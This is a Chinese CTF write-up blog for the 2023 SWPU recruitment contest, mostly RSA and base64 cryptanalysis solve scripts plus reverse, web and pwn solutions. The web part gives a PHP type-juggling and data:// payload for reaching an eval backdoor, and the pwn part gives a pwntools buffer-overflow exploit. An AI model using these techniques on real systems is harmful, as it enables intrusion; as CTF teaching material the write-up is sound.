2023SWPU

发表于 更新于 分类于 阅读次数: Waline: 本文字数: 2.3k 阅读时长 ≈ 8 分钟

记录2023SWPU招新赛————Crypto——Wp

Crypto

Ceaser_base

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
s = "HIJKLMNOPQRSTUVWXYZABCDEFGhijklmnopqrstuvwxyzabcdefg0123456789+/"    #码表

def My_base64_encode(inputs):
	bin_str = []
	for i in inputs:
		x = str(bin(ord(i))).replace('0b', '')
		bin_str.append('{:0>8}'.format(x))
	#print(bin_str)
	outputs = ""
	nums = 0
	while bin_str:
		temp_list = bin_str[:3]
		if(len(temp_list) != 3):
			nums = 3 - len(temp_list)
			while len(temp_list) < 3:
				temp_list += ['0' * 8]
		temp_str = "".join(temp_list)
		#print(temp_str)
		temp_str_list = []
		for i in range(0,4):
			temp_str_list.append(int(temp_str[i*6:(i+1)*6],2))
		#print(temp_str_list)
		if nums:
			temp_str_list = temp_str_list[0:4 - nums]
			
		for i in temp_str_list:
			outputs += s[i]
		bin_str = bin_str[3:]
	outputs += nums * '='
	print("Encrypted String:\n%s "%outputs)

print("-------input 'ys' to encode-------")	

sr = input("Please input!\n")
if(sr == "ys"):
	input_str = input("Please enter a string that needs to be encrypted: \n") 
	My_base64_encode(input_str)

cipher:Y2Cbj2owipIwjfIoipIcjNCbSEkcjterPNMrktCbkOCfGZIuFD1sPOIfi2Y1F2CrPNMbGJIdkDQzhEUvGDXnFurnB2ooitkvFDrnADsvFEsckZIKi21dFD55SJI0hNBnj3Ycjurni2FnkNosPNkoiDBnkNMyGETnjNeoF2BnhD4nFZItFD50FEU5POkcjterPNUoiNesGJHpCNs2FEXpSJIdiNM5GEQgPOkwiNdnjNeolZIoPN15j3YsjtsckETnF2oojtMqkNCfPNUoiNesGJHpCOQoktCzGEPpSJIwipI0hNBnGuQsGZIxi3CfitC5POYcPN1sGEXnGNstGtCfGD50POIsjuUcitMzhEYwGETnFD5rPOCbhEM1GZIoFtszhEY5PNUciEIoitsciuTzPNYsGtCokJIgkOQcitjnGD5siDssjfdnGtsbGJIzi3U0POQsiNM0hEGsjfdnFD5rPNkfFDY1FDezlZIrhEUqi3GsjpI0hNBnkOQ1kNnni2FnPrksiuUvhD4pSN1sFD51hNszGZe0hNBnGteoGfIwjfIVB1UKCLG7Y2CbUDneis81kLIfkKBomX

给了码表HIJKLMNOPQRSTUVWXYZABCDEFGhijklmnopqrstuvwxyzabcdefg0123456789+/

解base64就行

flag:NSSCTF{Gen5h1n_5t@rt5!}

EasyRSA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import libnum  
  
p=libnum.generate_prime(1024)  
q=libnum.generate_prime(1024)  
e=65537  
m="NSSCTF{*******************}"  
m=libnum.s2n(m)  
n=p*q  
phi_n=(p-1)*(q-1)  
d=libnum.invmod(e,phi_n)  
c=pow(m,e,n)  
  
print("p=",p)  
print("q=",q)    
print ("e=",e)  
print ("c=",c)

#p= 122912801126049869009003839542545176400185213365268209105714006257803073428638629824801261702125287814910668428403367391355051987389837804474055637991864563803834741161217607848968821280710324766558457056004037592628178078680121173634128054936108782807954132605887275556228703383455969903056759874047110115433
#q= 120790113700754477830062212762518406876786376726996249661848284428829412089402183812692045970711341815805796005449714738748110749559462448861357011272792817313060401380148108517705435100103533857957024851181447994572972501120774586405811257420853542417275740953525627232008812587423053626515513859653865873671
#e= 65537
#c= 7094224488947659163318199615533819770556597977720767621640224798887506152292861133457571683713587909779712343346370719403811813233693263526316785431883833118583425528830238629831001255198236686372518770451273159769779374149881346761523688131115323441973953523582174059584087249568245044443295176738493785560215046375056269378223045128094953923926250055718405799885041115025529297362914403732661935017257507786348635366480744933193471899621592092711962814949533564454932121056035003021428158830645604347966849572981124877683317022116903132719663958775850982016292384237647664448371811915879714093710876989697939277005

p,q都有了

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Util.number import *
import gmpy2


p= 122912801126049869009003839542545176400185213365268209105714006257803073428638629824801261702125287814910668428403367391355051987389837804474055637991864563803834741161217607848968821280710324766558457056004037592628178078680121173634128054936108782807954132605887275556228703383455969903056759874047110115433
q= 120790113700754477830062212762518406876786376726996249661848284428829412089402183812692045970711341815805796005449714738748110749559462448861357011272792817313060401380148108517705435100103533857957024851181447994572972501120774586405811257420853542417275740953525627232008812587423053626515513859653865873671
e= 65537
c= 7094224488947659163318199615533819770556597977720767621640224798887506152292861133457571683713587909779712343346370719403811813233693263526316785431883833118583425528830238629831001255198236686372518770451273159769779374149881346761523688131115323441973953523582174059584087249568245044443295176738493785560215046375056269378223045128094953923926250055718405799885041115025529297362914403732661935017257507786348635366480744933193471899621592092711962814949533564454932121056035003021428158830645604347966849572981124877683317022116903132719663958775850982016292384237647664448371811915879714093710876989697939277005

d = gmpy2.invert(e,(p-1)*(q-1))
m = pow(c,d,p*q)
print(long_to_bytes(m))
#NSSCTF{RSA_1s_so_ea3y_and_interest1ng!}

dpdp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from Crypto.Util.number import *
from libnum import *

flag = b'NSSCTF{******}' + b'1010101010101010101010101010101010101010100010101010101010101010101101'
p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537
d = inverse(e, (p-1)*(q-1))
dp = d % (p-1)
m = s2n(flag)
c = pow(m, e, n)
print(f'n = {n}')
print(f'c = {c}')
print(f'dp = {dp}')

'''
n = 62950660589752377241535942010457460675378335694404721223426371627802159493655570041534480026979837056215567303530448462076388942749116962945931432723672826148999814815864738069663127706046027850586024555861960247057288826014343547293035737544457656904257388300461848219257240252715837662741274235378360898441
c = 26392919777656338278184497106215581599692023606797351841011065350738534402079717897589592521000832026751736045905247050532819571969784687491977953157313304550096179520376626220816081159472339787295872214912587497324709488986746768994907107727184468228540635002062232484115731701648311946527233449512543132274
dp = 7088497034630351463006975624795947102639056977565074157092915907376477955247769847204254053775159112398217033648894620506901638351932922911273150932128973
'''

dp泄露模板题

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from Crypto.Util.number import long_to_bytes
import gmpy2

n = 62950660589752377241535942010457460675378335694404721223426371627802159493655570041534480026979837056215567303530448462076388942749116962945931432723672826148999814815864738069663127706046027850586024555861960247057288826014343547293035737544457656904257388300461848219257240252715837662741274235378360898441
c = 26392919777656338278184497106215581599692023606797351841011065350738534402079717897589592521000832026751736045905247050532819571969784687491977953157313304550096179520376626220816081159472339787295872214912587497324709488986746768994907107727184468228540635002062232484115731701648311946527233449512543132274
dp = 7088497034630351463006975624795947102639056977565074157092915907376477955247769847204254053775159112398217033648894620506901638351932922911273150932128973
e = 65537

def dp_leak(dp,c,n,e):
    for i in range(1,e):
        t = (dp * e - 1) % i        
        if t == 0:
            p = (dp * e - 1) // i + 1
            if n % p == 0:
                q = n // p
                d = gmpy2.invert(e,(p-1)*(q-1))
                print(long_to_bytes(pow(c,d,n)))
                
dp_leak(dp,c,n,e)
#NSSCTF{CTFCTFNSSNSS}

polynomial

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from Crypto.Util.number import *
flag = b'NSSCTF{******}'

m = bytes_to_long(flag)

a = getPrime(512)
b = getPrime(512)
c = getPrime(512)
d = getPrime(512)
e = getPrime(512)
x = getPrime(64)

p = getPrime(1024)

y = a*x**4 + b*x**3 + c*x**2 + d*x + e
y = y%p

print(f'p = {p}')
print(f'a = {a}')
print(f'b = {b}')
print(f'c = {c}')
print(f'd = {d}')
print(f'e = {e}')
print(f'y = {y}')
print(f'h = {x*m}')

'''
p = 158805288384650271811274620112885426807134870587281058486409657841571541118874370262125616758392586636436387032461169543181918821693975663497124408432536495676514953509756505781488235396628730376794651046582155886825258656047349260441547239700695773934518441411466809921946609164932234396841476405798428700843
a = 6782997653971692606019358747667066963688636909392719204001155907616272998599567932030340899158310591583056298423803386927289244122405887173827359025095219
b = 7373784501270128110088353737302182289453185058537147667058852830178883492374394182313086562761123093282613985656842374554466162992585768060168515936322837
c = 12604317328077074383094898759023155531982085126299017370476099122695860476733267706510100804874716354025394150676456477445303955715981977583036765619931291
d = 8651550199315105291497863570314512750737000678752642987669418859342691686702373116147125246177399639155277789016646392989483699799276013474039473014389069
e = 6819653219987864110332165353640553980353581969662542365282269257622467162685937603557862048653003559950780009596692439320585574228684924030626160305559221
y = 187626421635118933741196210961559541641107643327742932086152135660947241144749750951157691964883138108211067837818748515766812840026814947057023367814232867155997328882540000727585104081833734697954005690818776434169815240704563337
h = 36198427687223295973782557044383345640934859884880641150183916728479006412929786917944908958646498915497129126843345300628359
'''

先根据y = a*x**4 + b*x**3 + c*x**2 + d*x + e 这是在模p的域中,解这个方程得到x

然后根据h = x * m,除回来就行

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#sage
import gmpy2
p = 158805288384650271811274620112885426807134870587281058486409657841571541118874370262125616758392586636436387032461169543181918821693975663497124408432536495676514953509756505781488235396628730376794651046582155886825258656047349260441547239700695773934518441411466809921946609164932234396841476405798428700843
a = 6782997653971692606019358747667066963688636909392719204001155907616272998599567932030340899158310591583056298423803386927289244122405887173827359025095219
b = 7373784501270128110088353737302182289453185058537147667058852830178883492374394182313086562761123093282613985656842374554466162992585768060168515936322837
c = 12604317328077074383094898759023155531982085126299017370476099122695860476733267706510100804874716354025394150676456477445303955715981977583036765619931291
d = 8651550199315105291497863570314512750737000678752642987669418859342691686702373116147125246177399639155277789016646392989483699799276013474039473014389069
e = 6819653219987864110332165353640553980353581969662542365282269257622467162685937603557862048653003559950780009596692439320585574228684924030626160305559221
y = 187626421635118933741196210961559541641107643327742932086152135660947241144749750951157691964883138108211067837818748515766812840026814947057023367814232867155997328882540000727585104081833734697954005690818776434169815240704563337
h = 36198427687223295973782557044383345640934859884880641150183916728479006412929786917944908958646498915497129126843345300628359

R.<x> = PolynomialRing(Zmod(p))
f = a*x^4 + b*x^3 + c*x^2 + d*x + e - y

x = f.monic().small_roots(X=2^64,beta=0.4)
print(x)

x = 12896387745855437651
m = h // x
print(bytes.fromhex(hex(m)[2:]))
# NSSCTF{05223898-4a23-11ee-ae75-c03c59457d4d}

Classical Cipher

1
2
3
一只兔子翻过5层栅栏去找base玩

U2FsdGVkX19aQNEomnRqmmLlI9qJkzr0pFMeMBF99ZDKTF3CojpkTzHxLcu/ZNCYeeAV3/NEoHhpP5QUCK5Ac+HJlZBMGdKDYwko5+sAATQ=

Rabbit解密得到TGhmYlMlXXNwX2BTb3NoQWcye1VweSRfcXEGdmBheDx0I1BkMXdfXG0ldzd=bGBy

栅栏密码5层加密得到TlNTQ1RGe1dlbGMwbWVfdDBfdGhlX3cwcmxkXzBmX2NyeXB0MGdyYXBoeSEhIX0=

base64解密NSSCTF{Welc0me_t0_the_w0rld_0f_crypt0graphy!!!}

肮脏的base64

用ARCHPR爆破得到压缩包密码是:CTF

得到以下信息

1
2
3
今天组织拦截到的密文是HsVHOpJ0lpW9yK4akKWDWe4UW4ZKI0sMkwN3N2WZ,但是组织发现这个似乎并不是传统是base,经情报人员分析得到了原始加密的码表
o57gjn0Sb9ETqVLYOJyHX42kNaIhrWlU****eszCfD+dtPm1u3AMKpwRGvcxQZ8B
但码表在传递过程中被人为污染了一块,聪明的你能为组织解出今天的密文吗?

换表base64,写个脚本爆破码表

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import base64

cipher = "HsVHOpJ0lpW9yK4akKWDWe4UW4ZKI0sMkwN3N2WZ"

table1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" #这是ba64的表
table2 = "o57gjn0Sb9ETqVLYOJyHX42kNaIhrWlUeszCfD+dtPm1u3AMKpwRGvcxQZ8B"


list = []
for i in table1:
    if not (i in table2):
        list.append(i)

print(list)

for i in list:
    for j in list:
        if i != j:
            for k in list:
                if i != k and j != k:
                    for n in list:
                        if i != n and j != n and k != n:
                            pad = '' + i + j + k + n
                            table2 = "o57gjn0Sb9ETqVLYOJyHX42kNaIhrWlU" + pad + "eszCfD+dtPm1u3AMKpwRGvcxQZ8B"
                            flag = base64.b64decode(cipher.translate(str.maketrans(table2,table1)))
                            if b"NSSCTF" in flag:
                                print(flag)
                                break
#NSSCTF{WIKEY_GivE_u_this_f1ag}

close

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from libnum import *
from gmpy2 import *

p=generate_prime(1024)
q=next_prime(p)
e=65537
m='NSSCTF{*******}'
m=s2n(m)
n=p*q
phi=(p-1)*(q-1)
d=invmod(e,phi)
c=pow(m,e,n)

print("n=",n)
print("e=",e)
print("c=",c)

# n= 24981376790941538042242194741227892897407513396986731688877133454927442860995432316502739082570143505514748189761926835267759902439088795405888334103808204493954060044146586606969762154041793765844462081845490598211667272961234605967919438875499785814549051002289336390400088945736443426364361032870741024016549739096474413537901098157940458928277363388694717514323106251487767419607466664175936942972759711506228656400164583540573319572125036265662330306877811831045019686459493451558882811173136631573392182233161484350878695026357462290962322316959710815852914274474767115283825849610223430527125542218326259388501
# e= 65537
# c= 20159395346151098135636315342962498279920000537186367678734614295342297238729946157173169398141183795295342421626812913110784320710149318393656661582157610182569479131625808166266400522513050071081253869746865806961410702124426021839786686971490883603141916263075756918270160269956469968815381434371042453456185750940323619568741956243054983302281739844073931738335165924679149156513059772597287311150001080524533236565521881558592378167621577532597521749930820990533120461791013359786254216859344006298715497621642857727174896969485816794718062289736382736417151820935214824518306312811267158057425922650562544599188

$p,q$很接近

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from Crypto.Util.number import *
import gmpy2

n= 
e= 65537
c= 

t = gmpy2.iroot(n,2)[0]
p = gmpy2.next_prime(t)
q = n // p
d = gmpy2.invert(e,(p-1)*(q-1))
m = pow(c,d,n)
print(long_to_bytes(m))
#NSSCTF{1d518f8b-5878-11ee-acac-c03c59457d4d}

小明文?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from Crypto.Util.number import *
import random
m1=flag = b'NSSCTF{*******}'

def encrypt1(m1):
    p = getPrime(700)
    q = getPrime(700)
    n = p * q
    e = 5

    a = getPrime(128)
    b = getPrime(128)
    m1 = bytes_to_long(m1)
    mm1 = a * m1 + b

    c1 = pow(m1, e, n)
    c2 = pow(mm1, e, n)

    print(f'n = {n}')
    print(f'a = {a}')
    print(f'b = {b}')
    print(f'c1 = {c1}')
    print(f'c2 = {c2}')

# n = 13026126941826887019162872735099540876106694302074884925200107036130428843197729140372377590706535217469477301361486550282890330093772372813532795303163348233096919179478061917423707929667355386062657434467799360617526194768968700908096844475960205671302377364202483195391706116078632202015938962280529309403244885363904094804118278167720593581764017089021116316636464533785051436622916960956665030100255641288863474938703
# a = 280807370135687531454416708417179457159
# b = 210598260561987226227971066630761929397
# c1 = 5484670538103757119990644460454986219076673914082966464351809153114702100411054106785392646801736865489738145857425179185164710603704198643749378051371008266521829572436350080663825339915763509501690398283916091505443322384568973565599179112299853287766734493187659418383619877040013434926843623979979122417950089001830664273269598688130410251828579862218274297572192961909808728768317567218412746711665911495028223620671
# c2 = 249587944874112168607313602465869274336587750392364868939732783502223999305089384749508572630699199927194600499968110646290832205640569694933539973256281796631433129626712361622584048439446364992886884217198680921278383770604919381329363647924261642857483728973331091285820401689502291336332199019252649615680893389557508558362194551939434128389351824194393680744241807605416750291337127085044177563509645273228457253193

相关消息攻击

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import gmpy2
from Crypto.Util.number import *


def franklinReiter(n,e,c1,c2):
    PR.<x> = PolynomialRing(Zmod(n))
    g1 = x^e - c1
    g2 = (a*x + b)^e - c2

    def gcd(g1, g2):
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic()
    return -gcd(g1, g2)[0]

n = 
a = 
b = 
e = 5
c1 = 
c2 = 

m = franklinReiter(n,e,c1,c2)
print(long_to_bytes(int(m)))
#NSSCTF{89c507f3-4a21-11ee-a71e-c03c59457d4d}

dpdpdpdp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from Crypto.Util.number import *
flag = b'NSSCTF{******}'
p = getPrime(512)
q = getPrime(512)
n = p*q
e = getPrime(128)
d = inverse(e, (p-1)*(q-1))
dp = d % (p-1)
m = bytes_to_long(flag)
c = pow(m, e, n)

print(f'n = {n}')
print(f'e = {e}')
print(f'c = {c}')
print(f'dp = {dp}')

'''
n = 92288362151232755164303382554034496430634785857894506752180261103500715219090974532177552845107426542175470207920267802066773828210866572070045093611090322738109527534622730588618668861998969946471756352024368486322527057077613762697792913167023012077178671066981439295386486943067698150993422039585259179729
e = 229991316986730339421575788374847647237
c = 66178170892880340054212366602556925884485962775832591797127163461420023986798822926684824340567060840259672460835004142425374706821346941926520921852009455818529825976414766339170445233789109526300838535719649346266975388774091834431039678689254534566870194580604694419819400454951059125553501095973278807456
dp = 8987556601717285362487353965045062789633142861774364363374961991445049127918653163458814169532860957264061203394944931114888144611267605606197232438332289
'''

dp泄露加e很大

构造一个$a ^{dp\times e} \equiv a^{k(p-1) + 1 }\equiv a \mod p$

$\therefore a^{dp \times e} - a = kp$

同时模n得$a^{dp \times e} - a \equiv kp \mod n$

这样可以通过公因数求得p

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from Crypto.Util.number import getPrime,long_to_bytes
import gmpy2

n = 
e = 
c = 
dp = 

a = getPrime(10)

p = gmpy2.gcd(pow(a,dp*e,n)-a,n)    #pow(a,dp*e,n)-a 就是kp

q = n // p
d = gmpy2.invert(e,(p-1)*(q-1))
m = pow(c,d,n)
print(long_to_bytes(m))
# NSSCTF{D0_YoU_WAN1_TO_J0In_NsSCTf}

Reverse

base64

ida打开,shift + F12,拿到base64的密文:TlNTQ1RGe0lfcjNhbGx5X3cwdTFkX3U1ZV9iYXNlNjRfdDBfM25jb2RlX2ZsYWd9

解base64得到NSSCTF{I_r3ally_w0u1d_u5e_base64_t0_3ncode_flag}

UPX

先脱壳,再放ida,直接拿到flag:NSSCTF{UPX_c4n_3as1ly_5h3ll_pr0gr4m!}

test your cmd

打开终端

运行文件名.exe > 文件名.txt,成功保存运行结果:NSSCTF{l0Oks_l1ke_your_cmd_1s_w0rkin9_v3ry_well}

蟒蛇中文破解绿色版

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from base_class import 分数  # 好好好我终于可以在python里计算分数了!

a = 分数(分子=1, 分母=2)  # 好耶我有了一个分数!
b = 分数(1, 3)  # 原来还可以这样定义一个分数

列表 = []  # 哦哦哦这是一个列表,有啥用啊

# 不给你说了我要上强度了!


列表 = [
    str(分数(ord(_), 1) * a) if i % 2 == 0 else str(分数(ord(_), 1) * b)
    for i, _ in enumerate(__import__("secret").flag)
]

print(列表)

# 列表 = ['39/1', '83/3', '83/2', '67/3', '42/1', '70/3', '123/2', '116/3', '52/1', '49/3', '115/2', '95/3', '49/2', '115/3', '95/2', '112/3', '121/2', '95/3', '119/2', '37/1', '57/1', '36/1', '50/1', '11/1', '95/2', '35/1', '58/1', '35/1', '115/2', '39/1', '26/1', '34/1', '97/2', '36/1', '33/2', '125/3']

理解一下就行

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
c = ['39/1', '83/3', '83/2', '67/3', '42/1', '70/3', '123/2', '116/3', '52/1', '49/3', '115/2', '95/3', '49/2', '115/3', '95/2', '112/3', '121/2', '95/3', '119/2', '37/1', '57/1', '36/1', '50/1', '11/1', '95/2', '35/1', '58/1', '35/1', '115/2', '39/1', '26/1', '34/1', '97/2', '36/1', '33/2', '125/3']
a = []
b = []

for i in c:
    a.append(i.split('/')[0])
    b.append(i.split('/')[1])
    
flag = ""

for i in range(len(c)):
    if b[i] == "3" or b[i] == "2":
        flag += chr(int(a[i]))
    if b[i] == "1":
        if i % 2 == 0:
            flag += chr(int(a[i]) * 2)
        else:
            flag += chr(int(a[i]) * 3)

print(flag)
#NSSCTF{th1s_1s_py_world!_itisu4fal!}

字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
3           0 LOAD_CONST               1 ('***************************')
              2 STORE_FAST               0 (flag)

  4           4 BUILD_LIST               0
              6 STORE_FAST               1 (s)

  5           8 BUILD_LIST               0
             10 LOAD_CONST               2 ((177, 171, 170, 185, 167, 180, 126, 136, 126, 147, 150, 146, 122, 126, 142, 129, 139, 137, 142, 117, 122, 130, 195, 132, 116, 109, 104))
             12 LIST_EXTEND              1
             14 STORE_FAST               2 (tmp)

  6          16 LOAD_GLOBAL              0 (range)
             18 LOAD_GLOBAL              1 (len)
             20 LOAD_FAST                0 (flag)
             22 CALL_FUNCTION            1
             24 CALL_FUNCTION            1
             26 GET_ITER
        >>   28 FOR_ITER                30 (to 60)
             30 STORE_FAST               3 (i)

  7          32 LOAD_FAST                1 (s)
             34 LOAD_METHOD              2 (append)
             36 LOAD_CONST               3 (255)
             38 LOAD_GLOBAL              3 (ord)
             40 LOAD_FAST                0 (flag)
             42 LOAD_FAST                3 (i)
             44 BINARY_SUBSCR
             46 CALL_FUNCTION            1
             48 LOAD_FAST                3 (i)
             50 BINARY_ADD
             52 BINARY_XOR
             54 CALL_METHOD              1
             56 POP_TOP
             58 JUMP_ABSOLUTE           28

  8     >>   60 LOAD_FAST                2 (tmp)
             62 LOAD_FAST                1 (s)
             64 COMPARE_OP               2 (==)
             66 POP_JUMP_IF_FALSE       78

  9          68 LOAD_GLOBAL              4 (print)
             70 LOAD_CONST               4 ('you are right')
             72 CALL_FUNCTION            1
             74 POP_TOP
             76 JUMP_FORWARD             8 (to 86)

 11     >>   78 LOAD_GLOBAL              4 (print)
             80 LOAD_CONST               5 ('this is wrang')
             82 CALL_FUNCTION            1
             84 POP_TOP
        >>   86 LOAD_CONST               0 (None)
             88 RETURN_VALUE

上面代码等于

1
2
3
4
5
6
7
8
9
10
11
flag = '***************************'
s = []
tmp = [177, 171, 170, 185, 167, 180, 126, 136, 126, 147, 150, 146, 122, 126, 142, 129, 139, 137, 142, 117, 122, 130, 195, 132, 116, 109, 104]

for i in range(len(flag)):
    s.append(255 ^ ord(flag[i]) + i)

if tmp == s:
    print('you are right')
else:
    print('this is wrong')

逆回来即可

exp:

1
2
3
4
5
6
7
8
9
tmp = [177, 171, 170, 185, 167, 180, 126, 136, 126, 147, 150, 146, 122, 126, 142, 129, 139, 137, 142, 117, 122, 130, 195, 132, 116, 109, 104]

flag = ""
for i in range(len(tmp)):
    m = (tmp[i] ^ 255) - i
    flag += chr(m)
    
print(flag)
#NSSCTF{pyc_bytcode_wqh&dsy}

Web

colorful_snake

F12,调试器里面找到game.js文件

然后找到this_is_real_flag

\u004e\u0053\u0053\u0043\u0054\u0046\u007b\u0039\u0066\u0038\u0037\u0038\u0065\u0063\u0033\u002d\u0033\u0062\u0037\u0035\u002d\u0034\u0062\u0030\u0066\u002d\u0061\u0034\u0063\u0034\u002d\u0032\u0061\u0034\u0061\u0031\u0031\u0036\u0063\u0032\u0030\u0064\u0031\u007d

密文解Unicode得到NSSCTF{9f878ec3-3b75-4b0f-a4c4-2a4a116c20d1}

一键连接!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 <?php
highlight_file(__FILE__);
error_reporting(0);
$md5_1 = $_GET['md5_1'];
$md5_2 = $_GET['md5_2'];
$sha1_1 = $_GET['sha1_1'];
$sha1_2 = $_GET['sha1_2'];
$new_player =$_GET['new_player'];
if ($md5_1 !== $md5_2 && md5($md5_1) === md5($md5_2)) {
    if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2)) {
        if (file_get_contents($new_player) === "Welcome to NSSCTF!!!") {
            echo "Congratulations~~~~~~~~~";
            echo "试试need Antsword<br/>";
            @eval($_POST['Nss']);
        }else{
            echo "可曾听过data协议?";
        }
    } else {
        echo "sha1又如何相等呢";
    }
} else {
    echo "如何让md5值相等呢¿";
}
如何让md5值相等呢¿

md5强比较和sha1强比较,可用数组进行绕过,因为md5等函数不能处理数组,导致函数返回Null。而Null是等于Null的,导致了绕过

PHP特性 | 雲流のLowest World (c1oudfl0w0.github.io)

if (file_get_contents($new_player) === "Welcome to NSSCTF!!!")

利用data协议:文件包含漏洞之PHP伪协议中的data://的那些事~_data://text-CSDN博客

payload:

1
md5_1[]=1&md5_2[]=2&sha1_1[]=1&sha1_2[]=2&new_player=data:text/plain,Welcome to NSSCTF!!!

然后蚁剑连接

NSSCTF{44cdf084-8982-4a03-8a09-b7aff6c2a059}

pwn

guess

猜数字就行

Sign

gdb 文件名

disass backdoor (函数名)找到地址0x0401236

ROPgadget --binary 文件名 --only "rop/ret"找返回地址

构造exp:

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *

p = remote("node4.anna.nssctf.cn", 28601)

offset = 0x30+0x8
backdoor_addr = 0x401236
pop_ret = 0x000000000040101a 
payload = b'a'*offset +p64(pop_ret) + p64(backdoor_addr)
p.sendline(payload)
p.interactive()

# NSSCTF{88846cec-f874-4eff-b999-d5cfbe961639}
-------------已经到底啦!-------------